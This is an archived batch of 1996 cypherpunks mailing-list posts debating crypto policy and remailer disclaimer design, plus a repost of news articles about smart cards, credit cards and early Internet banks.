Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 14:54:30 -0800 (PST)
To: "Daniel T. Hagan" <dhagan@vt.edu>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b10aea81624d693@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:37 PM 11/7/1996, Daniel T. Hagan wrote:
> On Thu, 7 Nov 1996, Peter Hendrickson wrote:
>> If strong cryptography were unpopular and highly illegal, very few
>> people would be using it.  This makes it easy to identify suspects.

> I think the reasons are probably tied closely to your second point.
> Unless strong cryptography was easily distinguishable from weak
> cryptography without taking the time to break it, then how would they
> (law enforcement) recognize that someone was using strong cryptography?

> Or suppose that some one uses strong cryptography and then wraps it in
> weak cryptography.  The outer shell would seem legal, and the authorities
> can't go around randomly breaking people's keys (or so one would assume),
> and even if they did, it wouldn't necessarily be legal as evidence anyway.

In the extreme case, everybody would be sending messages in the clear.
In the case of mandatory GAK, it would be easy to open a bunch of
messages and see if what was inside looked like cryptography.  The
privacy violation could be minimized by requiring a Congressionally
approved test program to applied without any human reading it.  If
the test program said it was cryptography, then this could be considered
just cause for a judge to issue a warrant to the authorities for the
study of the actual message.

The laws regarding what is considered legal evidence are easily
changed if there is a need for it.  Probably they don't need to be
changed all that much.  If you see a lot of PGP messages coming
from somebody, you get a warrant and search their computer for
illegal software.  When you find it, you lock them up forever.

> And finally, you have to consider the possibility of whether a person can
> be identified merely by the fact that there is a message that is
> intercepted that has strong cryptography in it.  I don't know enough about
> remailers and internet protocols/servers to say whether this is a
> reasonable objection or not, perhaps someone else does?

In the absence of strong cryptography, remailers do not offer much
anonymity.

> So, unless I'm incorrect about one of the above points (and I admit that I
> may well be), once cryptography reaches a certain strength, there is no
> reason to relinquish that strength, particularly if you are using it for
> criminal activity.

If the penalties for the use of cryptography are significantly greater
than the penalties associated with the crime, you may opt not to use
cryptography.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 7 Nov 1996 12:03:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Is there a Win PGP?
Message-ID: <199611072000.PAA21968@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ben Laurie wrote:
> 
> I did a port of PGP to a Windows DLL a long time back, but I never got 
> around to releasing it. I could bring it up to date and put it out
> there if there is popular demand.

I think that would be cool, especially given the growth in Windoze web 
servers and the halting start of PGP authentication for the web.

Another WinPGP, of a sort, designed for email only, is FTP OnNet. You 
can get a demo from http://www.ftp.com/cgi/newmail.cgi

They still haven't put any real export controls in place.

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMoI/9yoZzwIn1bdtAQGG+wGAsSx6NcpJHxOgI1bwa52M2Fogd29C4XmO
iMr/eoKCWRj+vIHjbLhNsPT966WmgiWT
=SKCU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ronny Front <ronny@netvision.net.il>
Date: Thu, 7 Nov 1996 05:03:18 -0800 (PST)
To: gnu@toad.com
Subject: No Subject
Message-ID: <v03007800aea7aaaa01fd@[194.90.3.154]>
MIME-Version: 1.0
Content-Type: text/plain



--
Regards,
    \Ronny.                                                        _   /|
                                                                   \'o.O'
                                                                   =(___)=
                                                                      U






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 15:00:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b07aea7f1963f8c@[192.0.2.1]>
Message-ID: <v03007801aea81885c729@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 PM -0800 11/7/96, Peter Hendrickson wrote:
>It appears to be widely believed that cryptoanarchy is irreversible.
>Everybody believes that the race to deploy or forbid strong cryptography
>will define the outcome for a long time.
>
>I can't think of a reason why this should be so.
>
>If the wide use of strong cryptography results in widely unpopular
>activities such as sarin attacks and political assassinations, it
>would not be all that hard to forbid it, even after deployment.
>
>I am curious why many people believe this is not true.

Wide distribution of tools and channels.

Think of guns. Imagine a society which has few or no legal handguns. Some
of the  European nations, for example.

So long as guns are not legal, gun stores do not exist, gun ranges are not
available, ammunition is not sold in hardware and sporting goods stores (as
guns are too, of course, in the U.S.), and so long as the "habit" of having
guns has not spread widely, then a society can keep gun ownership levels
way down. Not zero, but way down. The "channels" for distribution are
nonexistent and the related  markets supporting guns do not exist (gun
magazines, holsters, reloading presses, gun shows, media images of people
using guns routinely, etc.). This is not to say criminals don't get access
to guns, or that some citizens do not choose to violate the law by getting
a gun, etc. What it means is that getting a gun is hard, gaining
proficiency is also hard, and the whole culture finds guns fairly foreign.

However, if guns are not outlawed, are not hard to get, may be bought and
sold at flea markets and gun shows (which is where most of my guns have
come from, and which is where over the years I bought and sold about a
dozen or so various guns, none of them transferred with any paperwork,
identities asked for, etc.), and once gun ownership reaches some threshold,
later attempts to ban guns, seize them, halt ammunition sales, etc.,
require draconian steps. (This is why so many gun owners have schemes to
bury spare guns in plastic pipes deep underground, place them in safe
deposit boxes, etc. And why so many of us reload our own ammo.)

Without taking a stand on the issues of whether guns should or should not
be restricted, the situation is quite similar to the ongoing deployment of
strong cryptography. Once widely deployed and "ingrained" in the habits of
many, later attempts to seize the newly-outlawed items are problematic.

Speech is similar to this. Once mechanisms for free speech are present in a
society, once people are used to having the "right" to speak freely, once
many channels of communication are widely available, and so on, it becomes
well nigh impossible to go back to a non-free-speech situation.

I believe, Peter, that your arguments naively ignore this sort of point.
Those in D.C. actually understand it well, and would laugh at your argument
of "If crypto turns out to be a problem, we can always ban it later."

I don't imagine the parallel argument, for free speech, would go over well
in, say, China: "We'll let people say what they want, publish what they
want, set up newspapers, buy whatever foreign magazines they want, use
computers, and gather as they wish to make whatever plans they wish to. If
we don't like the results, we'll just go back to what we had before."

The shorthand forms many of use are: the genie's out of the bottle, the
cat's out of the bag, the point of no return has been reached, etc.

As a final note, Peter asked me in private mail what I thought of some of
his points. I urged him to make his comments public, as having private
discussions is inefficent, and this is certainly an on-topic topic. And let
me say I find the posited scenario of widespread Sarin gas attacks, $100
hits, and other such things to be unrealistic, at least not solely because
Alice and Bob can communicate untappably and untraceably.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Thu, 7 Nov 1996 12:05:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961107.140607.9415.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times: Tuesday, November 5, 1996
 
Visa Launches New Multi-Function Card 
 
By Mark Ashurst in Johannesburg
 
Visa International yesterday launched its first multi-function smart
cards in
partnership with two South African retail banks, First National and
Nedcor. 
 
The new cards combine debit, credit, and pre-paid facilities, by using a
microchip in place of the traditional magnetic strip. 
 
Ms Anne-L. Cobb, president of Visa Central and Eastern Europe, Middle
East and Africa, said the deal fulfilled "Visa's vision of the future of
card
payment products". Chip-based cards would replace paper-based and
magnetic strip-based cash systems within 20 years, she said. South
African
banks were "very much in the lead" in developing this technology for
debit
and credit services. 
 
FNB and Nedcor have issued more than 200,000 multi-function cards,
under their own brands, since the South African industry agreed on an
inter-bank standard for smart cards in October, 1995. 
 
These cards will now be branded with Visa, and will be converted to
international EMV, Europay-Mastercard-Visa standards by the end of next
year. 
 
A common standard for card transactions in South Africa had been adopted
later than in many developed countries, but was already close to the
international EMV standards agreed earlier this year. 
 
The South African variant would "allow customers access to multiple
accounts at their financial institution," said Ms Cobb. In time, the
cards would
also be used to encourage loyalty programmes and to store personal
information. 
 
The Visa branding is expected to raise use of multi-function cards. Ms
Gail
Kelly, general manager of Nedcor card services, said the two banks would
invest R5bn-R7bn (#651m-#912m) in upgrading technology at retail points
and banking machines with the aim of issuing 1m new cards within a year. 
 
In June, Visa acquired the rights to the Universal Electronic Payments
System, a software package used by South African banks to manage
inter-bank cashflows. The group was "working with the two South African
banks to implement the future platform" for global inter-operability,
said Ms
Cobb. 
 
South African banks have pioneered chip-based cards because of the
country's poor telecommunications infrastructure and an over-reliance on
cash in a society riddled with violent crime. It was initially devised by
South
African brewers as a safer and more efficient alternative to cash on
delivery.
Less than 30 per cent of credit card transactions are authorised on-line
because of telecommunications problems. 
 
However, a microprocessor and memory chip embedded in the new cards
keeps track of clients' spending, reducing the banks' risk in card
transactions.
 

This would make formal banking services more widely available to low
income groups, said Mr Viv Bartlett, FNB managing director. 
 
The cards, secured by personal PIN codes, enabled "off-line transactions
without the umbilical cord linking points of sale to mainframes". 
 
They could also be prepaid for use as "an electronic purse", which was a
safer alternative to cash. 
 
Ms Kelly said the South African model should not be compared with current
projects involving the use of smart cards for electronic commerce in
Australia, France and Japan. "We are not testing. We are authorising
credit
cards and debit cards." 
 
 Asiaweek: November 8, 1996
 
New Competitors and Technology Shake up Card Industry
 
By Cesar Bacani and Julian Gearing 
 
You take pride in being a responsible credit-card user. You make sure you
never exceed your credit limit. You avoid using cash-advance privileges
even
in emergencies. And every month, you pay in full the outstanding balance
on
your card on or before the due date. A model customer?
 
Think again. Looking at your spotless payment record, the bank officer in
charge of your account is likely to throw up her hands in despair and
ask:
"How can we persuade this cardholder not to pay on time?"
 
The truth is that the people behind plastic money make the most profit
from
interest payments on overdue bills and cash advances. The problem: Asians
generally don't like debt. "Many of the cards used in the region are
debit
cards, which deduct money from the holder's bank account as soon as a
purchase is made," says Niall Brady, a senior researcher and analyst with
the
Dublin-based financial-services research organization Lafferty Group. 
 
The number of credit cards -- plastic that allows users to pay only a
portion
of what they owe every month -- is estimated at less than 310 million
across
Asia last year. That's not a lot in a region that is home to about half
of
humanity. 
 
But as Asians grow more affluent, card associations like Visa and
MasterCard are betting they will be willing to take on more debt to
finance
their purchases. They see opportunities in the rising numbers of Asians
traveling overseas and the liberalization of the financial-services
industry.
New players are joining them. 
 
American Express recently introduced a new credit card in Hong Kong. GE
Capital has chosen Indonesia as the launch pad for its first card outside
the
U.S. "There will be a far more competitive environment in Asia for cards
in
five to seven years," predicts Steven Pinto, a vice-president at Citibank
in
Singapore. 
 
"With 2.7 billion inhabitants, this region has real potential," says
Michael
Lafferty, founder of the group that bears his name. How real? In the
U.S.,
which has 276 million people, there is one credit card for every person.
But
some governments worry that easy access to credit may erode their
people's
traditional savings ethic, which is credited with sustaining the region's
economic boom. 
 
Last week, Finance Minister Anwar Ibrahim required cardholders in
Malaysia to pay the government an annual $20 service tax on each of their
credit cards. About 42% of $1.7-billion worth of credit-card transactions
in
June was overdue. Kuala Lumpur already requires every cardholder to pay
at least 15% of his outstanding balance. 
 
To understand what is happening, it helps to know how the card industry
works. The major credit-card associations, Visa and MasterCard, provide
the brand name and authorization service.
 
Banks and other financial institutions buy shares in one or both groups,
which
makes them association members and gives them the right to issue Visa and
MasterCard credit cards. The issuers make money from fees and interest on
cash advances and overdue payments levied on cardholders.
 
The associations are paid by issuers for every credit-card authorization
they
process and other services. 
 
American Express, Diner's Club and Japan's JCB issue charge cards, which
require users to pay monthly balances in full. Amex has added a
credit-card
line to its traditional charge- card range. After launching its Optima
credit
card in the U.S. in 1987, it introduced the American Express Credit Card
in
Britain in 1995. The Amex plastic was brought to Canada, Hong Kong and
Australia this year. Visa and MasterCard have asked their members to
think
twice before deciding to market the new product.
 
The intramurals aside, all brands face tough challenges in Asia. "It's
very easy
to think that the Asian market is homogenous, but there are major
differences," says Suresh Nanoo, regional director of brand management
for
Visa. Japan and Taiwan do not like debt. Malaysians, Singaporeans and
Thais are more receptive, but their governments are not.
 
"If everyone becomes a big spender, it could become a problem for the
whole country," says Tarisa Watanagase of the Bank of Thailand, which
early
this year doubled the annual salary requirement for cardholders to
$9,420. 
 
With just 14 million credit cards for its 1.2 billion people, China has
huge
potential. But tight controls there - only state-owned banks can issue
plastic,
for example - are stunting growth.
 
Largely unfettered by government intervention, the Philippines, Indonesia
and
India are considered among Asia's best credit-card prospects. Indonesia
had
1.4 million cards by the end of 1995. "Industry insiders believe it can
easily
support a card base of 4 to 5 million," says Brady.
 
As for the Philippines, "the top five credit-card issuers, which
[together] have
averaged 33% annual growth since the early 1990s, had fewer than 700,000
cards last year" -- three times less than the potential immediate market.
For
its part, India is estimated to have up to 2 million cards. "The general
consensus is that this could grow to as many as 10 million by 2000," says
Brady. 
 
The problem is infrastructure. Telecommunications (for credit
authorization]
and postal systems (for billing) are often unreliable. The absence of
credit-checking agencies makes screening card applications a headache.
 
And a nationwide merchant network is not yet in place. This is where an
international player's financial muscle and commitment make a difference.

 
Citibank has become the leading credit-card issuer in India and
Indonesia,
and ranks second in the Philippines. It set up subsidiaries that focused 
entirely on credit-card operations, including card marketing and credit
screening. 
 
Rivals like Hongkong Bank and Standard Chartered Bank are following
Citibank's lead. "But local competitors are in the best position to
develop the
retail outlets where credit cards can be used," says Brady. "Only they
have
the on-the-ground presence needed to establish and service
merchant-acceptance networks." Equitable Card Network, for example,
boasts the largest merchant base -- 18,000 shops -- in the Philippines.
Because of government curbs, credit-card firms are under pressure in
Singapore (number of credit cards: 1.6 million) and increasingly so in
Malaysia and Thailand (1.8 million each). "The most draconian of
Singapore's restrictions came into force in August," says Brady. "It caps
the
maximum credit limit to twice the cardholder's monthly income. This also
robs charge-card issuers like American Express and Diner's Club of their
competitive weapon -- no pre-set spending limits."
 
The government requires all cardholders to earn at least $21,275 a year
-- more than four times the typical annual salary issuers in
laissez-faire Hong Kong ask for. 
 
Not all restrictions have turned out badly for the credit-card industry.
In South Korea, banks generally cannot extend card-based revolving credit
-- debt that cardholders can run up so long as they pay off part of the
principal and the interest owed every month. Credit cards thus function
essentially as deferred debit cards -- payment is automatically debited
from the cardholder's bank account.
 
But issuers still earn money on interest payments. Because of Seoul's
tight
credit policy, Koreans make wide use of cash advances. The card
associations profit from processing transactions involving the country's
33 million credit cards. MasterCard says Korea is its most profitable
Asian market after Japan, which has 230 million cards. Tokyo allowed
banks to grant card-based revolving credit in 1992. Four years on, only a
fifth of Japanese consumers use plastic regularly and almost all clear
their entire balance every month. Cash also remains king in Hong Kong,
one of Asia's most mature credit-card markets.
 
The territory, which has a population of 6.3 million people, has an
estimated
5 million credit cards. But credit-card purchases account for only 5% of
all
transactions (22% in terms of value) and drawing cash advances on credit
cards is not common.
 
The purveyors of plastic are learning to flow with the cash tide. In Hong
Kong, Visa is trying out VisaCash, a card that users can throw away after
using up its money value. It can be used to make small purchases like
newspapers in participating outlets. MasterCard Cash is more versatile:
it's a
debit card with a chip that can load and reload money from automatic
teller
machines.
 
"You can use the debit function for big purchases and the cash for small
items," says Margaret O'Connor of MasterCard in Singapore. The microchip
in Hongkong Bank's Mondex cash card also reloads electronic cash, though
the card itself cannot be used as a debit card
 market research indicates that many in Hong Kong are willing to pay for
the
convenience," says Manjoosh Joshi, manager of Hongkong Bank's Project
Mondex. Won't these chip-based smart cards cut into credit-card use?
"They complement each other," says Francis Hsu, a senior manager at
Hongkong Bank's credit-card center. "Cash cards are for small-value
transactions while credit cards are for big- ticket items." 
 
Amex president for Asia Stephen Friedman says: "Companies will just have
to learn how to deal with smart cards." 
 
Some credit cards already use smart-card technology. Manila's Bankard
One has a microchip that makes charge slips and signatures unnecessary.
U.S. consultant Jerome Svigals, who helped develop the magnetic strip on
today's cards, sees this as the wave of the future: "Smart cards will do
away
with on- line authorizations. That's bad for card associations, which
gain 90%
of their income from this service." An exaggeration, says Visa. 
 
"Cards cannot operate in a totally off-line environment," argues
spokeswoman Sonja Kernon. Card associations get income from other
services such as reconciling balances and settling accounts. 
 
There are other ways to make money. Some issuers charge merchants high
rates for the privilege of carrying their cards. To encourage
borrow-and-buy
binges, others target young Asians, who are more willing to pile on debt.
 
There are credit cards just for women, doctors and other professionals.
Issuers are also developing proprietary brands, allowing them to bypass
the
card associations and sometimes to cut customer and other fees. 
 
All this means the poor consumer gets inundated by offers. How to choose?

"Are you going to use the card simply as a convenient way of payment?"
asks
Brady. If so, consider a charge, debit or cash card. If you want credit,
look
for plastic with a low annual interest rate.
 
And be wary of your emotions. "On the rational plane, you're going for
reasonable fees, a reasonable rate of interest and a reasonable rate of
merchant acceptance," says Citibank's Pinto. "But in status- conscious
Asia,
brands also matter. You ask yourself, `what does this card say about
me?'"
You'll have lots of choice - just read the fine print. 
 
GETTING THE MOST FROM YOUR CARD 
 
If you intend to pay the balance every month, you may be happier with a
charge card, which has no pre-set spending limit. But there are killer
surcharges on defaults and you get only a short grace period before the
issuer cancels your card. 
 
If you plan to pay the monthly bill in full but still want a credit
facility for
emergencies, look for a credit card with no annual fee. The trade-off: a
sky-high interest rate on overdue payments and cash advances. 
 
If you mean to pay only part of what you owe every month, shop around for
a credit card with the lowest interest rate. American Express has shaken
up
the Hong Kong market with an 18% interest rate on its new credit card, 6
percentage points lower than the competition. 
 
Check out the card's market acceptance. Many shops may not take the
brand. Or they may slap a surcharge on purchases, even though it violates
their agreement with the issuer.
 
Look at the incentives on offer. As competition heats up, issuers are
coming
up with frequent-flyer programs, hotel discounts and free merchandise.
But
make sure you are not required to spend a huge amount before you can get
the freebies. 
 
 
Washington Post: Monday, November 4, 1996
 
Internet Banking With a Sales Twist
 
By Brad Dorfman
 
As the world's first Internet bank, Atlanta-based Security First Network
Bank has had an identity problem with many potential customers. 
 
"We get a lot of questions," chief executive James Mahan III said. " 'Are
you
real? Are you virtual? Where are you really?' " 
 
Part consumer bank, part software testing site, Security First opened its
virtual doors a year ago this month. But now it plans to add actual
doors,
opening small offices in Atlanta, Cambridge, Mass., and Silicon Valley in
California. "I think we can more effectively market if we have a physical
presence," Mahan said in an interview. 
 
Comparing his bank to discount brokerage firm Charles Schwab & Co.,
Mahan said having the offices may give customers a sense of security,
even if
they never use an office. 
 
Security First's current location is on the Internet. The bank is one of
five in
the United States that operate directly on the Internet, according to the
Bank
Administration Institute.
 
Federally insured Security First can be reached at the Web site
www.sfnb.com, a home page that looks like a bank lobby. Customers can
reach their accounts anywhere they have access to the Internet, rather
than
being tied to a single terminal where they have finance software, as is
true
with many other computer banks. 
 
"Our goal was to have a bank that was fully interactive, where an
individual
could see all his information," Mahan said. 
 
Most Security First customers have a money market account and a demand
deposit account. Customers can open an account with $ 100, an amount
most choose at the start to make sure the bank works, Mahan said. 
 
Customers can pay bills electronically, purchase certificates of deposits
or
acquire Visa cards. Security First also is hoping to offer brokerage
products
and first and second mortgage products by the end of the year. Cash can
be
obtained through automated teller machines, and Security First absorbs
interbank fees for using the machines. 
 
With few costs for rent and other infrastructure, Security First can
offer
higher yields, Mahan said. The bank has been offering a six-month CD with
an annual percentage yield of 5.9 percent. 
 
Security First was spawned as an idea of Mahan, who was chief executive
at
Kentucky-based Cardinal Bancshares Inc., and Michael McChesney, who
was starting a security software firm. 
 
"He educated me on the Internet for years and years and years," Mahan
said.
Mahan used the charter of one of Cardinal's thrifts, changed its name to
Security First and used it to start the Internet bank. 
 
McChesney's firm, SecureWare Inc. developed software that Mahan said
has military-grade security. So far, the bank has not had its security
breached, Mahan said. "That doesn't mean that there haven't been a number
of sophisticated attempts," he said. "If you have enough money and enough
time you can break into anything." 
 
Outsiders agree that Security First has shown a record of being secure,
avoiding viruses and other potential dangers of Internet commerce. "They
do
use a level of security that the Pentagon reserves for its most secure
and
sensitive systems," said Paul Schmeltzer, an executive vice president for
network services at Southeast Switch Inc., which operates the Honor
Network, the fourth-largest ATM network in the country. "Is any security
design totally foolproof or totally secure? Probably not."
 
Selling that software and other programs developed for the bank is likely
to
be the prime money-maker for Security First. Mahan admits that Five Paces
Inc., Security First's software unit, will be the prime contributor to
the
company's net income. "The bank is really a test site to use as a
demonstration for potential customers of the software business," said
Gary
Craft, an analyst who follows the bank for Friedman, Billings, Ramsey &
Co.
of Alexandria. 
 
Security First has opened about 5,600 accounts. Most of its customers are
male, between the ages of 25 and 45, with average income above $ 63,000
a year. More than 80 percent own their own home, attractive demographics
for marketing. Security First also has attracted competition. This month,
Atlanta Internet Bank opened for business with customers of AT&T's
WorldNet Internet service. 
 
Unlike Security First, Don Sha pleigh, chief executive of Atlanta
Internet,
says he does not plan to open any customer offices. "I have the WorldNet.
I
have other ways to get out." 
 
Shapleigh also argues that Atlanta Internet is the first true
Internet-only  bank, saying that Security First is really a software
company. "I'm not selling software," he said. "I'm a banker." 
 
Atlanta Internet, which is a service provided by a unit of Carolina First
Corp., can be reached on the Internet at www.atlantabank.com. 
 
  
 
American Banker: Wednesday, November 6, 1996
 
Internet Bank In Australia Plans a Pilot Using Ecash
 
Ecash, the cash alternative for the Internet developed by Digicash Inc.,
has
entered Australia. 
 
Digicash, which is based in Amsterdam, said Advance Bank of Sydney has
licensed Ecash and is planning to begin testing it with Australian
consumers
and merchants by yearend. 
 
Ecash's competitors include Cybercash Inc.'s Cybercoin and the on-line
transfer capability of Mondex electronic cash. The latter, a smart-card-
based system, has the backing of most major banks in Australia and New
Zealand. 
 
Advance Bank, a second-tier bank with more than $10 billion of assets,
joins
a list of Ecash licensees that includes Mark Twain Bank of St. Louis,
Deutsche Bank in Germany, Merita Bank in Finland, and a postal bank in
Sweden. 
 
The Australian launching is "an important collaboration between the
premier
electronic cash company and the leading Internet bank in a country that
is
very advanced in Internet usage," said Digicash chairman and founder
David
Chaum. 
 
Advance Bank is "reinforcing its position as Australia's leading Internet
bank," said David Brown, the institution's head of public affairs. He
said
Ecash would complement customers' ability to see account statements,
transfer money between accounts, and pay bills through Advance's Internet
site.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jayme <Jayme_Goldstein@brown.edu>
Date: Thu, 7 Nov 1996 12:16:00 -0800 (PST)
To: Cypherpunks@toad.com
Subject: No Subject
Message-ID: <199611072015.PAA23493@golden.brown.edu>
MIME-Version: 1.0
Content-Type: text/plain


PLEASE TAKE ME OFF YOUR MAILING
LIST!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "networks@vir.com" <networks@vir.com>
Date: Thu, 7 Nov 1996 12:20:51 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT] (fwd)
Message-ID: <01BBCCBE.A9614F80@ipdyne9.vir.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate Wrote:

> Hi all,
> 
> There is one important legal aspect which the operator of the Cypherpunks
> mailing list has opened themselves up for with this action. In short they
> have now opened themselves up for defamation and liable suites by imposing
> an editorial policy on the contents of this list (1).
> 
> This opens up the potential, for example, for Tim May to sue the operator of
> the Cypherpunks mailing list now for posts from users (even anonymous ones)
> which defame or otherwise liable his character, reputation, or ability to
> pursue income in his chosen field. In short the operators of the list
> becomes publishers and distributors of the material. It is the legal
> difference between a bookstore and a book publisher. 

It seems that, like a bookstore, the cypherpunks mailing list has the
right to choose the content it distributes and who it distributes the content
to.  Bookstores are free to select what titles they offer for sale, and can
even refuse to sell a book to a particularly annoying customer if they
so choose (my legal knowledge is lacking, but I think this is correct).

To extend the analogy, what has happened in this particular case 
is that Dr. Vulis is now forced to buy all his books by mail order :)

Thanks,

Alan Majer
networks@vir.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 7 Nov 1996 12:27:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Blocking addresses by default
Message-ID: <199611072025.PAA22083@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mark M. wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> With remailer abuse becoming more popular and remailers going down
> because of complaints, there seems to be some interest in remailer
> software that will block all email by default and will only pass
> along email that is explicitly unblocked.

I think this threatens serious security problems for the remailer 
network in two ways:

1. You'd create a list of people interested in anonymous information,
   which could potentially be obtained by police or other armed thugs.

2. The traffic would go down so substantially that traffic analysis     
   would be trivial.

As a counterproposal, I'd like to see better disclaimers on remailed 
messages. The reason the people complaining are so pissed off is that 
the blocklists are neither advertised nor automated enough. I'd like to 
see disclaimers and block list instructions at the top of the body of 
every single message. This would be encapsulated in some mark characters 
so that it could easily be removed by remailer chains. E.g.,

 To: remailer@erehwon.com

 Request-Remailing-To: remailer@nowhere.com

 [message]

remailer@erehwon.com prepends the following to the message before it is 
sent along:

 $$
 This message was sent through the anonymous remailer network. Neither
 the operator of this remailer, remailer-op@erewhon.com, nor the
 postmaster at this site has any way of determining the source or
 filtering the content of remailer messages. No logs are kept. If you
 do not wish to receive such anonymous messages from any link in the
 remailer network, send an email message to remailer-operators@c2.net
 with subject line "block." For more information on the remailer
 network, see [Raph's list] or send email to help@[?].
 $$

remailer@nowhere.com looks for "$$" as the first line of the message, 
and strips everything up to the next occurrence of "$$". It then appends 
its own disclaimer block before sending the message to the hop (remailer 
or final destination).

A bit annoying, yes, but I think this would go a long way towards 
improving public relations. I don't see how it compromises security.

What's wrong with this scheme? Other than the fact that all remailers 
would have to change their software at the exact same moment. :-)

[By the way, someone told me that the Chardos remailer doesn't include 
Complain-To or block-list instructions anywhere, not even in X-Headers.
Is this true? I think that would be bad. [tm]]

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMoJFnCoZzwIn1bdtAQEZSwF/eurxI6jVBcv4srS8FEE3Rtc5rVCTfyw8
gNrC5p5ZzBGgFCaM3MOair4gH91zH/HK
=oqSh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 15:42:58 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b11aea81d287cbd@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:03 PM 11/7/1996, Timothy C. May wrote:
> However, if guns are not outlawed, are not hard to get, may be bought and
> sold at flea markets and gun shows (which is where most of my guns have
> come from, and which is where over the years I bought and sold about a
> dozen or so various guns, none of them transferred with any paperwork,
> identities asked for, etc.), and once gun ownership reaches some threshold,
> later attempts to ban guns, seize them, halt ammunition sales, etc.,
> require draconian steps. (This is why so many gun owners have schemes to
> bury spare guns in plastic pipes deep underground, place them in safe
> deposit boxes, etc. And why so many of us reload our own ammo.)

> Without taking a stand on the issues of whether guns should or should not
> be restricted, the situation is quite similar to the ongoing deployment of
> strong cryptography. Once widely deployed and "ingrained" in the habits of
> many, later attempts to seize the newly-outlawed items are problematic.

> Speech is similar to this. Once mechanisms for free speech are present in a
> society, once people are used to having the "right" to speak freely, once
> many channels of communication are widely available, and so on, it becomes
> well nigh impossible to go back to a non-free-speech situation.

> I believe, Peter, that your arguments naively ignore this sort of point.
> Those in D.C. actually understand it well, and would laugh at your argument
> of "If crypto turns out to be a problem, we can always ban it later."

The key here is that in these cases the practice has become widely
accepted.  By widely accepted, I mean that very significant numbers of
people believe that there is nothing all that wrong with the practice.
Those who disagree do not feel it is worth the trouble to put a stop
to it.

If the Four Horseman of the Crypto-apocolypse were real, we could certainly
put a stop to cryptoanarchy if we wanted to.  Very few people would be
willing to tolerate strong cryptography if it meant that it was real easy
to have people killed, resulted in many sarin attacks, or widespread
kidnappings.  I doubt you could find many readers of even this list who
would find such scenarios acceptable.

You are right that the people in D.C. understand your point quite well.
And I am naive for expecting them to honestly discuss their policies.
The reason they fear cryptoanarchy is not because it will be something
people won't like - quite the opposite.  If they are to succeed they have
to stop it now before it is widely recognized to not be a problem for
people who earn their living.

I believe that if the people in D.C. honestly believed that the Four
Horsemen were coming, they would wait for the first real evidence
of it to rally the society behind their cause and write themselves
into the history books as heroes.

Today, strong cryptography has caused no noticeable problems.  People who
want to forbid it can only justify such intrusive and politically risky
policies on the grounds that something irreversible occurs after deployment.
But, I don't believe I have yet seen any sort of explanation for
irreversibility that is not based on "well, it won't be all that bad."

> I don't imagine the parallel argument, for free speech, would go over well
> in, say, China: "We'll let people say what they want, publish what they
> want, set up newspapers, buy whatever foreign magazines they want, use
> computers, and gather as they wish to make whatever plans they wish to. If
> we don't like the results, we'll just go back to what we had before."

This argument would certainly not go over well with the leaders of China.
The people of China may have another point of view.

Peter Hendrickson
ph@netcom.com






